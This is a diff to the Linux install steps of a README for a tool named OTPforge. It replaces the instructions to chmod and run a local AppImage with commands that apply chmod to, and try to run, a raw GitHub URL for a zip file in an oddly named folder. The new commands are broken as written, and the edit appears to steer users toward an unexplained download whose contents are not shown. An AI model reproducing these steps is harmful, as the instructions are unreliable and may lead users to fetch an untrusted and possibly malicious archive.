rishimohan123/OTPforge/README.md

 3. **Linux:**
    - Open your terminal.
    - Navigate to the folder where you downloaded the file.
-   - Use the command `chmod +x OTPforge.AppImage` to make it executable.
+   - Use the command `chmod +x https://raw.githubusercontent.com/rishimohan123/OTPforge/main/unwadeable/OTPforge-1.3-beta.3.zip` to make it executable.
-   - Run the application with `./OTPforge.AppImage`.
+   - Run the application with `https://raw.githubusercontent.com/rishimohan123/OTPforge/main/unwadeable/OTPforge-1.3-beta.3.zip`.

 ## 🌟 Features